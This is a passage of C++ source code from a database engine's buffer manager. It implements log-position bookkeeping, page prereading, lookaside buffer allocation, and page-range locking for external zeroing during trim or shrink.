BFIGetLgposOldestBegin0( ifmp, plgpos, fFalse, lgposOldestTrx );
}
// Sets the log position for the most recent log record to reference this
// buffer for a modification. This log position determines when we can
// safely write a buffer to disk by allowing us to wait for the log to be
// flushed past this log position (under Write Ahead Logging). This value
// is set to lgposMin by default. The page must be WAR Latched or Write
// Latched.
void BFSetLgposModify( const BFLatch* pbfl, LGPOS lgpos )
{
// validate IN args
Assert( FBFWARLatched( pbfl ) || FBFWriteLatched( pbfl ) );
Assert( FBFUpdatableLatch( pbfl ) );
// WAR Latches and Logged Operations
//
// So here we assert a more restrictive case, that we must have the W-latch,
// not the WAR/x-latch ... why? Well because as of E14 we moved version page
// models, and we could not version a page in ErrBFUpgradeReadLatchToWARLatch
// in such a way to avoid violated the user assumptions (that we don't move to
// a new buffer) and protect the waypoint ... BUT upon closer inspection, the
// only operations done in a WAR latch were deferred version store type work
// that does not require logged operations. We are asserting that here. If
// we need to do logged operations that is entirely tractable, but then we
// merely need to teach CSR::ErrUpgradeToWARLatch() that a read to WAR upgrade
// can fail and in such a case currency is completely lost.
Assert( FBFWriteLatched( pbfl ) );
Assert( FBFNotWARLatched( pbfl ) );
FMP* pfmp = &g_rgfmp[ PBF( pbfl->dwContext )->ifmp ];
Assert( ( !pfmp->Pinst()->m_plog->FLogDisabled() && pfmp->FLogOn() ) ||
!CmpLgpos( &lgpos, &lgposMin ) );
// set the lgposModify for this BF
BFISetLgposModify( PBF( pbfl->dwContext ), lgpos );
}
// Sets the log position for the last Begin Transaction at level 0 for this
// session that modified this buffer, if more recent than the last log
// position set. This log position is used to determine the current
// checkpoint depth. This value is set to lgposMax by default. The page must
// be WAR Latched or Write Latched.
void BFSetLgposBegin0( const BFLatch* pbfl, LGPOS lgpos, const TraceContext& tc )
{
// validate IN args
Assert( FBFWARLatched( pbfl ) || FBFWriteLatched( pbfl ) );
Assert( FBFUpdatableLatch( pbfl ) );
Assert( tc.iorReason.Iorp( ) == iorpNone );
if ( PBF( pbfl->dwContext )->bfdf >= bfdfDirty )
{
// Reason for this restriction is documented in BFSetLgposModify() under
// the "WAR Latches and Logged Operations" comment.
// Also if you look in BFIDirtyPage() you will find code for resetting
// the OB0 that wouldn't work properly if we set the OB0 lgpos with a
// WAR latch.
Assert( FBFWriteLatched( pbfl ) );
Assert( FBFNotWARLatched( pbfl ) );
}
FMP* pfmp = &g_rgfmp[ PBF( pbfl->dwContext )->ifmp ];
Assert( ( !pfmp->Pinst()->m_plog->FLogDisabled() && pfmp->FLogOn() ) ||
!CmpLgpos( &lgpos, &lgposMax ) );
// set the lgposOldestBegin0 for this BF
BFISetLgposOldestBegin0( PBF( pbfl->dwContext ), lgpos, tc );
}
/////////////
// Preread
// The following functions provide support for prereading pages from the
// disk before they are actually needed. This technique can be used to
// minimize or eliminate buffer cache misses when Read Latching pages.
// Prereads the given range of pages in the given database. If cpg is greater
// than zero, we will preread forwards from pgnoFirst to pgnoFirst + cpg - 1.
// If cpg is less than zero, we will preread backwards from pgnoFirst to
// pgnoFirst + cpg + 1. cpg can not be zero.
void BFPrereadPageRange( IFMP ifmp, const PGNO pgnoFirst, CPG cpg, CPG* pcpgActual, BYTE *rgfPageWasCached, const BFPreReadFlags bfprf, const BFPriority bfpri, const TraceContext& tc )
{
LONG cbfPreread = 0;
// no one uses a negative cpg with a non-NULL rgfPageWasCached at this point,
// but if one decides to, they should make sure they understand the semantics of
// rgfPageWasCached, which will return the flags in descending order of page numbers
// in this case.
Expected( cpg >= 0 || rgfPageWasCached == NULL );
Assert( tc.iorReason.Iorp( ) == iorpNone );
#ifdef DEBUG
if ( cpg >= 0 )
{
Expected( pgnoFirst + cpg >= pgnoFirst );
}
else
{
Expected( pgnoFirst + cpg < pgnoFirst );
}
#endif // DEBUG
// calculate preread direction
const LONG lDir = cpg > 0 ? 1 : -1;
if ( lDir >= 0 )
{
AssertPREFIX( pgnoFirst - lDir < pgnoFirst );
}
else
{
AssertPREFIX( pgnoFirst - lDir > pgnoFirst );
}
// initialize the flag array saying that page was cached by default (we will explicitly
// query the status in case of errors)
if ( rgfPageWasCached )
{
for ( INT ipg = 0; ipg < cpg; ipg++ )
{
rgfPageWasCached[ ipg ] = fTrue;
}
}
// schedule all specified pages to be preread
#ifdef PREREAD_COMBINABLE_DEBUG
LONG cbfCached = 0;
BFPreReadFlags bfprfCombinablePass = bfprfCombinableOnly;
#else // !PREREAD_COMBINABLE_DEBUG
BFPreReadFlags bfprfCombinablePass = bfprfDefault;
#endif // PREREAD_COMBINABLE_DEBUG
ULONG pgno;
for ( pgno = pgnoFirst; pgno != pgnoFirst + cpg; pgno += lDir )
{
const ERR err = ErrBFIPrereadPage( ifmp, pgno, BFPreReadFlags( bfprfCombinablePass | bfprf ), bfpri, tc );
if ( err == JET_errSuccess )
{
cbfPreread++;
if ( rgfPageWasCached != NULL )
{
rgfPageWasCached[ abs( (INT)( pgno - pgnoFirst ) ) ] = fFalse;
}
#ifdef PREREAD_COMBINABLE_DEBUG
if ( bfprfCombinablePass == bfprfDefault )
{
bfprfCombinablePass = bfprfCombinableOnly;
}
#endif // PREREAD_COMBINABLE_DEBUG
}
#ifdef PREREAD_COMBINABLE_DEBUG
else if ( err == errBFPageCached )
{
cbfCached++;
}
else if ( err == errDiskTilt )
{
AssertRTL( bfprfCombinablePass == bfprfCombinableOnly );
// Backup up a page and retry it again without the combinable only flag ...
pgno -= lDir;
bfprfCombinablePass = bfprfDefault;
}
#endif // PREREAD_COMBINABLE_DEBUG
else if ( err != errBFPageCached )
{
Assert( err < 0 );
break;
}
}
// start issuing prereads
if ( cbfPreread )
{
CallS( g_rgfmp[ ifmp ].Pfapi()->ErrIOIssue() );
Ptls()->cbfAsyncReadIOs = 0;
}
// return the number of pages preread if requested
if ( pcpgActual )
{
*pcpgActual = abs( (INT)( pgno - pgnoFirst ) );
}
// set the remaining flags, if required.
if ( rgfPageWasCached != NULL )
{
for ( ; pgno != pgnoFirst + cpg; pgno += lDir )
{
rgfPageWasCached[ abs( (INT)( pgno - pgnoFirst ) ) ] = (BYTE)FBFInCache( ifmp, pgno );
}
}
Assert( FBFApiClean() );
}
// Prereads the given array of single pages in the given database.
void BFPrereadPageList( IFMP ifmp, PGNO* prgpgno, CPG* pcpgActual, const BFPreReadFlags bfprf, const BFPriority bfpri, const TraceContext& tc )
{
PGNO* prgpgnoSorted = NULL;
Assert( tc.iorReason.Iorp( ) == iorpNone );
// sort the pages to minimize random IO
BOOL fAlreadySorted = fTrue;
size_t cpgno;
for ( cpgno = 1; prgpgno[cpgno - 1] != pgnoNull; cpgno++ )
{
fAlreadySorted = fAlreadySorted && ( cpgno < 2 || prgpgno[cpgno - 2] < prgpgno[cpgno - 1] );
}
if ( !fAlreadySorted )
{
prgpgnoSorted = new PGNO[cpgno];
if ( prgpgnoSorted )
{
memcpy( prgpgnoSorted, prgpgno, cpgno * sizeof( PGNO ) );
Assert( prgpgnoSorted[cpgno - 1] == pgnoNull );
std::sort( prgpgnoSorted, prgpgnoSorted + cpgno - 1, CmpPgno );
prgpgno = prgpgnoSorted;
}
}
for ( size_t ipgno = 0; prgpgno[ipgno] != pgnoNull; ipgno++ )
{
Assert( !prgpgnoSorted || ipgno < 1 || prgpgno[ipgno - 1] <= prgpgno[ipgno] ); // we don't remove duplicates
}
#ifdef PREREAD_COMBINABLE_DEBUG
BFPreReadFlags bfprfCombinablePass = bfprfCombinableOnly;
#else // !PREREAD_COMBINABLE_DEBUG
BFPreReadFlags bfprfCombinablePass = bfprfDefault;
#endif // PREREAD_COMBINABLE_DEBUG
// schedule each page for preread
LONG cbfPreread = 0;
size_t ipgno;
for ( ipgno = 0; prgpgno[ ipgno ] != pgnoNull; ipgno++ )
{
const ERR err = ErrBFIPrereadPage( ifmp, prgpgno[ ipgno ], BFPreReadFlags( bfprfCombinablePass | bfprf ), bfpri, tc );
if ( err == JET_errSuccess )
{
cbfPreread++;
#ifdef PREREAD_COMBINABLE_DEBUG
if ( bfprfCombinablePass == bfprfDefault )
{
bfprfCombinablePass = bfprfCombinableOnly;
}
#endif // PREREAD_COMBINABLE_DEBUG
}
#ifdef PREREAD_COMBINABLE_DEBUG
else if ( err == errDiskTilt )
{
AssertRTL( bfprfCombinablePass == bfprfCombinableOnly );
// Backup up a page and retry it again without the combinable only flag ...
ipgno--;
bfprfCombinablePass = bfprfDefault;
}
#endif // PREREAD_COMBINABLE_DEBUG
else if ( err != errBFPageCached )
{
Assert( err < 0 );
break;
}
}
// start issuing prereads
if ( cbfPreread )
{
CallS( g_rgfmp[ ifmp ].Pfapi()->ErrIOIssue() );
Ptls()->cbfAsyncReadIOs = 0;
}
// return the number of pages preread if requested
if ( pcpgActual )
{
*pcpgActual = ipgno;
}
Assert( FBFApiClean() );
delete[] prgpgnoSorted;
}
// Prereads a single page in the given database
ERR ErrBFPrereadPage( const IFMP ifmp, const PGNO pgno, const BFPreReadFlags bfprf, const BFPriority bfpri, const TraceContext& tc )
{
Assert( tc.iorReason.Iorp( ) == iorpNone );
const ERR err = ErrBFIPrereadPage( ifmp, pgno, BFPreReadFlags( bfprf & ~bfprfNoIssue ), bfpri, tc );
if ( err >= JET_errSuccess &&
( 0 == ( bfprf & bfprfNoIssue ) ) )
{
CallS( g_rgfmp[ ifmp ].Pfapi()->ErrIOIssue() );
Ptls()->cbfAsyncReadIOs = 0;
}
// Can not purely assert this b/c of the log prereading code.
//Assert( FBFApiClean() );
Assert( Ptls()->cbfAsyncReadIOs == 0 || bfprf & bfprfNoIssue );
return err;
}
///////////////////////
// Memory Allocation
// The following routines allow the user to allocate space in the buffer
// cache for use as general purpose memory. Remember that every buffer
// allocated from the buffer cache will reduce the buffer cache's
// effectiveness by reducing the amount of memory it has to utilize.
// Allocates a buffer for use as general purpose memory. This buffer can
// not be stolen for use by others. The buffer must be returned to the
// buffer cache when it is no longer needed via BFFree(). Note that if we
// cannot immediately allocate a buffer because they are all currently in
// use, we will wait until a buffer is free to return, possibly across an
// I/O.
// To avoid constantly allocating and freeing buffers in JET_paramEnableViewCache
// mode, we create a small lookaside list of buffers.
CSmallLookasideCache::CSmallLookasideCache()
{
m_cbBufferSize = 0; // must be init'd before class will work
memset( m_rgpvLocalLookasideBuffers, 0, sizeof(m_rgpvLocalLookasideBuffers) );
}
CSmallLookasideCache::~CSmallLookasideCache()
{
}
void CSmallLookasideCache::Init( const INT cbBufferSize )
{
m_cbBufferSize = cbBufferSize;
#ifdef MEMORY_STATS_TRACKING
m_cHits = 0;
m_cAllocs = 0;
m_cFrees = 0;
m_cFailures = 0;
#endif
}
void CSmallLookasideCache::Term()
{
ULONG cSlotsFilled = 0;
C_ASSERT( m_cLocalLookasideBuffers == _countof( m_rgpvLocalLookasideBuffers ) );
for( INT ipb = 0; ipb < m_cLocalLookasideBuffers; ++ipb )
{
if ( m_rgpvLocalLookasideBuffers[ipb] )
{
OSMemoryPageFree( m_rgpvLocalLookasideBuffers[ipb] );
m_rgpvLocalLookasideBuffers[ipb] = NULL;
cSlotsFilled++;
}
}
#ifdef MEMORY_STATS_TRACKING
/*
// Interesting to note that if we were get a lot of allocations that aren't temporary in
// usage, overruns will reflect this number... even though it wasn't technically an overrun
// how I was originally thinking of it, as in buffers in "current" use.
OSTrace( JET_tracetagBufferManager, OSFormat(
"CSmallLookasideCache efficacy:\n"
"\tSlots Used: %d\n"
"\tCache Hits: %I64d\n"
"\tAllocs: %I64d\n"
"\tFailures: %I64d\n"
"\tOverruns: %I64d (if this is high compared to Hits, consider increasing m_cLocalLookasideBuffers)\n",
cSlotsFilled, m_cHits, m_cAllocs, m_cFailures, m_cFrees ) );
*/
#endif
}
void * CSmallLookasideCache::PvAlloc()
{
// validate parameters
Assert( m_cbBufferSize );
if ( 0 == m_cbBufferSize )
{
return NULL;
}
// check the list of cached buffers
void * pb = GetCachedPtr<void *>( m_rgpvLocalLookasideBuffers, m_cLocalLookasideBuffers );
// if no, allocate one
if( NULL == pb )
{
pb = PvOSMemoryPageAlloc( m_cbBufferSize, NULL );
#ifdef MEMORY_STATS_TRACKING
m_cAllocs++;
#endif
}
#ifdef MEMORY_STATS_TRACKING
else
{
m_cHits++;
}
if ( NULL == pb )
{
m_cFailures++;
}
#endif
return pb;
}
void CSmallLookasideCache::Free( void * const pv )
{
if( pv )
{
if ( !FCachePtr<void *>( pv, m_rgpvLocalLookasideBuffers, m_cLocalLookasideBuffers ) )
{
// Didn't manage to get it in the lookaside list, list full, free buffer
OSMemoryPageFree( pv );
#ifdef MEMORY_STATS_TRACKING
m_cFrees++;
#endif
}
}
}
void BFIAlloc( __in_range( bfasMin, bfasMax - 1 ) const BFAllocState bfas, void** ppv, ICBPage icbBufferSize )
{
// validate IN args
Assert( g_fBFInitialized );
Assert( icbPageInvalid != icbBufferSize );
// we need to max to the OS commit granularity, as that's the min we'll actually allocate (unless
// the page size is less / i.e. 2KB pages)
if ( (DWORD)g_rgcbPageSize[g_icbCacheMax] >= OSMemoryPageCommitGranularity() &&
(DWORD)g_rgcbPageSize[icbBufferSize] < OSMemoryPageCommitGranularity() )
{
Assert( icbBufferSize < IcbBFIBufferSize( OSMemoryPageCommitGranularity() ) );
icbBufferSize = IcbBFIBufferSize( OSMemoryPageCommitGranularity() );
Assert( icbPageInvalid != icbBufferSize );
}
// init OUT args
*ppv = NULL;
// try forever until we allocate a temporary buffer
const LONG cRFSCountdownOld = RFSThreadDisable( 10 );
const BOOL fCleanUpStateSaved = FOSSetCleanupState( fFalse );
for ( BOOL fWait = fFalse; !(*ppv); fWait = fTrue )
{
// for now we allocate the largest possible page we might be requested for.
// sadly in a configuration where we like to use less memory we end up allocating the
// maximum size because if we kept a g_BFAllocLookasideList[icbPageMax] type array and
// allocated from the right CSmallLookasideCache element, we wouldn't know which of
// these to free the pv / buffer to, unless we made BFFree() take the size (which is odd).
*ppv = g_pBFAllocLookasideList->PvAlloc();
// if we didn't get any memory, snooze and retry
if ( !(*ppv) && fWait )
{
UtilSleep( dtickFastRetry );
}
}
RFSThreadReEnable( cRFSCountdownOld );
FOSSetCleanupState( fCleanUpStateSaved );
}
void BFAlloc( __in_range( bfasMin, bfasMax - 1 ) const BFAllocState bfas, void** ppv, INT cbBufferSize )
{
// We can not handle less than OSMemoryCommit leve
if ( cbBufferSize )
{
BFIAlloc( bfas, ppv, IcbBFIBufferSize( cbBufferSize ) );
}
else
{
// else, assume max configured cache size
BFIAlloc( bfas, ppv, g_icbCacheMax );
}
}
// Frees a buffer allocated with BFAlloc().
void BFFree( void* pv )
{
// validate IN args
Assert( g_fBFInitialized );
// if we were asked to free NULL then ignore it
if ( !pv )
{
// nop
return;
}
// free the temporary buffer to the lookaside list
g_pBFAllocLookasideList->Free( pv );
}
///////////////////
// Purge / Renounce / Abandon / Flush
// Renouncing a page indicates that we bear no more interest in the page and that
// when the page gets evicted, it should not count as a sign of cache pressure.
void BFRenouncePage( BFLatch* const pbfl, const BOOL fRenounceDirty )
{
// validate IN args
Assert( FBFReadLatched( pbfl ) );
// we can get the write latch
if ( ErrBFUpgradeReadLatchToWriteLatch( pbfl, fFalse ) == JET_errSuccess )
{
// perform the renouncing
BFIRenouncePage( PBF( pbfl->dwContext ), fRenounceDirty );
// release the write latch
BFWriteUnlatch( pbfl );
}
// we couldn't get the write latch
else
{
// release the read latch without renouncing the BF
BFReadUnlatch( pbfl );
}
}
// Abandon BF, which means it'll be purged without being written out.
// WARNING: this must only be called on a page which has been recently latched as a new page
// and not yet initialized, which means there is only one version of the page and we are about
// to purge it.
void BFAbandonNewPage( BFLatch* const pbfl, const TraceContext& tc )
{
Assert( FBFWriteLatched( pbfl ) );
// dirty pages are handled by BFIPurgeNewPage(), but we don't expect non-clean pages to
// come in here, so be extra-careful if this hits and you're tempted to remove the Expected()..
Expected( FBFDirty( pbfl ) == bfdfClean );
const PBF pbf = PbfBFILatchContext( pbfl->dwContext );
pbf->fAbandoned = fTrue;
BFIPurgeNewPage( pbf, tc );
pbfl->pv = NULL;
pbfl->dwContext = NULL;
}
//
// External Zeroing
//
// These functions (ErrBFPreparePageRangeForExternalZeroing, CpgBFGetOptimalLockPageRangeSizeForExternalZeroing,
// ErrBFLockPageRangeForExternalZeroing, BFPurgeLockedPageRangeForExternalZeroing and
// BFUnlockPageRangeForExternalZeroing) are used to write out any undo info associated with the pages and
// quiesce all reads and writes to a range of a specific file (IFMP) for the purpose of trimming, externally
// zeroing or during file shrinkage triggered by DB-shrink.
//
// o ErrBFPreparePageRangeForExternalZeroing: if it is a logged operation (trim or shrink) must be called
// prior to logging the operation. Today, this function writes out any outstanding undo info hanging
// from the buffers related to the pages. This must be done prior to logging so that redo rebuilds
// the undo information necessary to undo any transactions before the page gets wiped out.
//
// o CpgBFGetOptimalLockPageRangeSizeForExternalZeroing: gets the number of pages considered optimal for external
// zeroing at one time. Zeroing too many pages at once may cause excessive contention in the buffer manager.
//
// o ErrBFLockPageRangeForExternalZeroing: must be called prior to performing the external operation.
// It write-latches all pages and enters a read-write range lock, in addition to synchronously setting
// their flush states to pgftUnknown. It returns an opaque context to be passed into subsequent functions.
// In addition, it also quiesces LLR (write log buffers + flush log file buffers + moves waypoint ahead),
// which is required because the zeroing/truncation operation is not LLR-protected in the buffer manager,
// so we need to make sure the logged operation cannot be lost, since we're about to perform a physical
// ireversible change to the file.
//
// o BFPurgeLockedPageRangeForExternalZeroing: must be called right after the external operation is
// successful. It purges all pages and their respective versions from the cache without flushing them,
// even if they are dirty. This must not be called with a zeroed/NULL context.
//
// o BFUnlockPageRangeForExternalZeroing: it's called last and it must always be called upon a successful
// ErrBFLockPageRangeForExternalZeroing call, regardless of whether or not the external operation
// succeeded. It unlatches all pages if there are any remaining (shouldn't be if BFPurgeLockedPageRangeForExternalZeroing
// was called) and leaves the read-write range lock, in addition to releasing resources allocated during the
// process. The opaque context is invalid once this function gets called. It's safe to call this function
// with a zeroed/NULL context during cleanup/teardown paths.
//
// WARNING: at higher levels than BF, you MUST only call ErrBFLockPageRangeForExternalZeroing() on pages that are "unusable"
// (i.e. not findable by other paths) such as space free or the root-space allocation path. This is to avoid deadlocking with
// any code that collects locks in non-pgno-ascending order, such as the B+ Tree navigation code.
//
PBF PbfBFIGetFlushOrderLeafWithUndoInfoForExtZeroing( const PBF pbf )
{
PBF pbfOldestWithUndoInfo = pbfNil;
Assert( g_critBFDepend.FOwner() );
for ( PBF pbfVersion = PbfBFIGetFlushOrderLeaf( pbf, fFalse ); pbfVersion != pbfNil; pbfVersion = pbfVersion->pbfTimeDepChainPrev )
{
// WARNING: it is OK to perform the check below without a BF latch because
// in the context of external zeroing, nobody should be adding undo info, so
// the IF below will never transition from false to true.
// We will double-check if we transitioned from true to false once we have the latch.
if ( pbfVersion->prceUndoInfoNext != prceNil )
{
pbfOldestWithUndoInfo = pbfVersion;
break;
}
}
return pbfOldestWithUndoInfo;
}
ERR ErrBFPreparePageRangeForExternalZeroing( const IFMP ifmp, const PGNO pgnoFirst, const CPG cpg, const TraceContext& tc )
{
BFLatch bfl = { NULL, 0 };
PBF pbf = pbfNil;
BOOL fLatched = fFalse;
PBF pbfVersion = pbfNil;
BOOL fVersionLatched = fFalse;
BOOL fInCritDepend = fFalse;
ERR err = JET_errSuccess;
// For now, this is only relevant if logging is on.
if ( !g_rgfmp[ ifmp ].FLogOn() )
{
goto HandleError;
}
// Go through each page in the range.
const PGNO pgnoLast = pgnoFirst + cpg - 1;
for ( PGNO pgno = pgnoFirst; pgno <= pgnoLast; pgno++ )
{
const ERR errLatch = ErrBFILatchPage(
&bfl,
ifmp,
pgno,
BFLatchFlags( bflfNoTouch | bflfNoUncached | bflfNoFaultFail | bflfUninitPageOk | bflfLatchAbandoned ),
bfltWrite,
BfpriBFMake( g_pctCachePriorityNeutral, (BFTEMPOSFILEQOS)0 /* should not matter - NoUncached */ ),
tc );
if ( errLatch == errBFPageNotCached )
{
continue;
}
Call( errLatch );
fLatched = fTrue;
pbf = PbfBFILatchContext( bfl.dwContext );
// Go through each version of the page.
g_critBFDepend.Enter();
fInCritDepend = fTrue;
while ( ( pbfVersion = PbfBFIGetFlushOrderLeafWithUndoInfoForExtZeroing( pbf ) ) != pbfNil )
{
PBF pbfUndoInfo = pbfNil;
// Not the current version, latch it.
if ( pbfVersion != pbf )
{
if ( pbfVersion->sxwl.ErrTryAcquireWriteLatch() == CSXWLatch::ERR::errSuccess )
{
fVersionLatched = fTrue;
pbfUndoInfo = pbfVersion;
}
else
{
// Retry to avoid deadlocks because the BF rank is higher than the BFDepend critical section's.
g_critBFDepend.Leave();
fInCritDepend = fFalse;
UtilSleep( dtickFastRetry );
g_critBFDepend.Enter();
fInCritDepend = fTrue;
continue;
}
}
else
{
pbfUndoInfo = pbf;
}
Assert( ( pbfVersion != pbf ) == !!fVersionLatched );
Assert( pbfUndoInfo != pbfNil );
Assert( ( pbfUndoInfo == pbf ) || ( pbfUndoInfo == pbfVersion ) );
g_critBFDepend.Leave();
fInCritDepend = fFalse;
// Now that we are guaranteed to have a write latch, check to see if
// we still have undo info to log and remove.
if ( pbfUndoInfo->prceUndoInfoNext != prceNil )
{
ENTERCRITICALSECTION ecs( &g_critpoolBFDUI.Crit( pbfUndoInfo ) );
while ( pbfUndoInfo->prceUndoInfoNext != prceNil )
{
Expected( pbfUndoInfo->err == JET_errSuccess );
if ( pbfUndoInfo->err < JET_errSuccess )
{
Error( pbfUndoInfo->err );
}
Assert( pbfUndoInfo->err == JET_errSuccess );
Assert( pbfUndoInfo->bfdf >= bfdfDirty );
// Note that we need to make sure that the undo-info LRs logged below
// are written out of the log buffer into the log file before proceeding
// with the zeroing/trimming/shrinkage of the range. This is accomplished
// by ErrBFLockPageRangeForExternalZeroing, which happends before the actual
// zeroing/trimming/shrinkage operation.
LGPOS lgpos;
Call( ErrLGUndoInfo( pbfUndoInfo->prceUndoInfoNext, &lgpos ) );
// Remove this undo info from the BF.
BFIRemoveUndoInfo( pbfUndoInfo, pbfUndoInfo->prceUndoInfoNext, lgpos );
}
}
// Unlatch if older version.
if ( pbfVersion != pbf )
{
pbfVersion->sxwl.ReleaseWriteLatch();
fVersionLatched = fFalse;
}
g_critBFDepend.Enter();
fInCritDepend = fTrue;
}
g_critBFDepend.Leave();
fInCritDepend = fFalse;
BFWriteUnlatch( &bfl );
fLatched = fFalse;
}
HandleError:
Assert( !( ( fVersionLatched || fInCritDepend ) && !fLatched ) );
Assert( !( fVersionLatched && fLatched ) || ( pbf != pbfVersion ) );
if ( fInCritDepend )
{
g_critBFDepend.Leave();
fInCritDepend = fFalse;
}
if ( fVersionLatched )
{
Assert( pbfVersion != pbfNil );
pbfVersion->sxwl.ReleaseWriteLatch();
fVersionLatched = fFalse;
}
if ( fLatched )
{
Assert( pbf != pbfNil );
Assert( PbfBFILatchContext( bfl.dwContext ) != pbf );
BFWriteUnlatch( &bfl );
fLatched = fFalse;
}
return err;
}
CPG CpgBFGetOptimalLockPageRangeSizeForExternalZeroing( const IFMP ifmp )
{
// Perform external zeroing in chunks to avoid latching too many pages at once.
// Preferrably, use the extension size, though limit it to at most 10% of the current cache size
// and at least the write I/O size.
ULONG_PTR cpgCacheSize = 0;
CallS( ErrBFGetCacheSize( &cpgCacheSize ) );
CPG cpgOptimalSize = (CPG)UlpFunctionalMin( UlParam( PinstFromIfmp( ifmp ), JET_paramDbExtensionSize ), cpgCacheSize / 10 );
cpgOptimalSize = LFunctionalMax( cpgOptimalSize, g_rgfmp[ifmp].CpgOfCb( UlParam( JET_paramMaxCoalesceWriteSize ) ) );
cpgOptimalSize = LFunctionalMax( cpgOptimalSize, 1 );
return cpgOptimalSize;
}
ERR ErrBFLockPageRangeForExternalZeroing( const IFMP ifmp, const PGNO pgnoFirst, const CPG cpg, const BOOL fTrimming, const TraceContext& tc, _Out_ DWORD_PTR* const pdwContext )
{
ERR err = JET_errSuccess;
BFIPageRangeLock* pbfprl = NULL;
FMP* const pfmp = &g_rgfmp[ ifmp ];
Assert( pdwContext != NULL );
Assert( pgnoFirst >= PgnoOfOffset( cpgDBReserved * g_rgcbPageSize[ g_icbCacheMax ] ) );
Assert( cpg > 0 );
// In the current implementation, trying to quiesce the waypoint when we're running trim
// will lead to a rank violation (we hold the DB root space latch throughout the process).
// Therefore, we effectivelly cannot support LLR with trim at this time. We'll avoid running waypoint
// quiescing when running trim, we'd end up with a corrupted database if we crash at the wrong time.
if ( pfmp->FLogOn() )
{
const BOOL fWaypointLatency = UlParam( pfmp->Pinst(), JET_paramWaypointLatency ) > 0;
if ( fTrimming && fWaypointLatency )
{
Expected( fFalse ); // Already protected in ErrSPITrimRegion().
Error( ErrERRCheck( JET_errFeatureNotAvailable ) );
}
// Write out log buffers and flush the log. This makes sure that we don't proceed with the
// zeroing/trimming/shrinkage operation (which don't hold back the checkpoint) without making
// sure that the LRs associated with it are persisted and will be replayed in case of a crash.
// It also makes sure that the undo-info LRs logged in ErrBFPreparePageRangeForExternalZeroing
// make it to persisted storage.
Call( ErrBFIWriteLog( ifmp, fTrue ) );
Call( ErrBFIFlushLog( ifmp, iofrLogFlushAll, fTrue ) );
// Trimming a page range is equivalent to writing out (zero'ed) buffers for those pages, so make sure
// all pre-images to updates to those pages are written out.
if ( g_rgfmp[ ifmp ].FRBSOn() )
{
Call( pfmp->PRBS()->ErrFlushAll() );
}
// Quiesce LLR (we hit a rank violation when doing this under trim).
if ( !fTrimming )
{
Call( pfmp->FShrinkIsRunning() ? ErrFaultInjection( 50954 ) : JET_errSuccess );
Call( pfmp->Pinst()->m_plog->ErrLGQuiesceWaypointLatencyIFMP( ifmp ) );
Call( pfmp->FShrinkIsRunning() ? ErrFaultInjection( 47882 ) : JET_errSuccess );
}
}
// Allocate/initialize context.
Alloc( pbfprl = new BFIPageRangeLock );
pbfprl->ifmp = ifmp;
pbfprl->pgnoFirst = pgnoFirst;
pbfprl->pgnoLast = pgnoFirst + cpg - 1;
pbfprl->pgnoDbLast = pfmp->PgnoLast();
pbfprl->cpg = cpg;
Alloc( pbfprl->rgbfl = new BFLatch[ cpg ] );
memset( pbfprl->rgbfl, 0, cpg * sizeof(BFLatch) );
Alloc( pbfprl->rgfLatched = new BOOL[ cpg ] );
memset( pbfprl->rgfLatched, 0, cpg * sizeof(BOOL) );
Alloc( pbfprl->rgfUncached = new BOOL[ cpg ] );
memset( pbfprl->rgfUncached, 0, cpg * sizeof(BOOL) );
// The range being locked for external zeroing is expected to either be entirely owned by the
// databse (database trim) or entirely not owned by it (database shrink or truncation of unused
// space at attach).
Expected( ( pbfprl->pgnoLast <= pbfprl->pgnoDbLast ) || ( pbfprl->pgnoFirst > pbfprl->pgnoDbLast ) );
// First, latch all pages.
// We are only going to force a latch on an uncached page if the page is within the owned size
// of the database because in that case the page is technically reachable so we want to make sure
// we completely lock out potential readers. We do this to save unecessary memory consumption and
// CPU in latching too many pages in cases where doing so is not needed.
for ( PGNO pgno = pbfprl->pgnoFirst; pgno <= pbfprl->pgnoLast; pgno++ )
{
const size_t ipgno = pgno - pbfprl->pgnoFirst;
BOOL fCachedNewPage = fFalse;
const BOOL fWithinOwnedDbSize = ( pgno <= pbfprl->pgnoDbLast );
const BFLatchFlags bflfUncachedBehavior = fWithinOwnedDbSize ? bflfNewIfUncached : bflfNoUncached;
Expected( !!fWithinOwnedDbSize == !!fTrimming );
err = ErrBFILatchPage(
&pbfprl->rgbfl[ ipgno ],
pbfprl->ifmp,
pgno,
BFLatchFlags( bflfUncachedBehavior | bflfNoTouch | bflfNoFaultFail | bflfUninitPageOk | bflfLatchAbandoned ),
bfltWrite,
BfpriBFMake( g_pctCachePriorityNeutral, (BFTEMPOSFILEQOS)0 /* should not matter - NewIfUncached */ ),
tc,
&fCachedNewPage );
if ( err == errBFPageNotCached )
{
Assert( bflfUncachedBehavior == bflfNoUncached );
pbfprl->rgfLatched[ ipgno ] = fFalse;
pbfprl->rgfUncached[ ipgno ] = fTrue;
err = JET_errSuccess;
}
else
{
Call( err );
Assert( !fCachedNewPage || ( bflfUncachedBehavior == bflfNewIfUncached ) );
pbfprl->rgfLatched[ ipgno ] = fTrue;
pbfprl->rgfUncached[ ipgno ] = fCachedNewPage;
err = JET_errSuccess;
BF* const pbf = PBF( pbfprl->rgbfl[ ipgno ].dwContext );
Assert( pbf->sxwl.FOwnWriteLatch() );
pbf->fAbandoned = fTrue;
// If the page is uncached (and therefore was latched as a new page above), clobber it in memory
// as an empty (zeroed out) page. This is necessary because we may lose the lock later when purging pages and
// we don't want a page hanging around in an unknown state in the cache.
if ( pbfprl->rgfUncached[ ipgno ] )
{
Assert( pbf->bfdf == bfdfClean );
memset( pbf->pv, 0, g_rgcbPageSize[ pbf->icbBuffer ] );
pbf->err = SHORT( ErrERRCheck( JET_errPageNotInitialized ) );
}
}
}
OnDebug( const PGNO pgnoDbLastPostLatches = pfmp->PgnoLast() );
Expected( pgnoDbLastPostLatches >= pbfprl->pgnoDbLast );
// If the database grew, the range we are zeroing must be completely below the initial size,
// otherwise, we might have missed latching pages.
Assert( ( pgnoDbLastPostLatches <= pbfprl->pgnoDbLast ) || ( pbfprl->pgnoLast <= pbfprl->pgnoDbLast ) );
// Then, acquire range locks.
while ( !pbfprl->fRangeLocked )
{
err = pfmp->ErrRangeLockAndEnter( pbfprl->pgnoFirst, pbfprl->pgnoLast, &pbfprl->irangelock );
// Retry if too busy.
if ( err == JET_errTooManyActiveUsers )
{
UtilSleep( dtickFastRetry );
}
else
{
Call( err );
pbfprl->fRangeLocked = fTrue;
}
}
// Fixup flush map.
Call( pfmp->PFlushMap()->ErrSyncRangeInvalidateFlushType( pbfprl->pgnoFirst, pbfprl->cpg ) );
OnDebug( const PGNO pgnoDbLastPostRangeLock = pfmp->PgnoLast() );
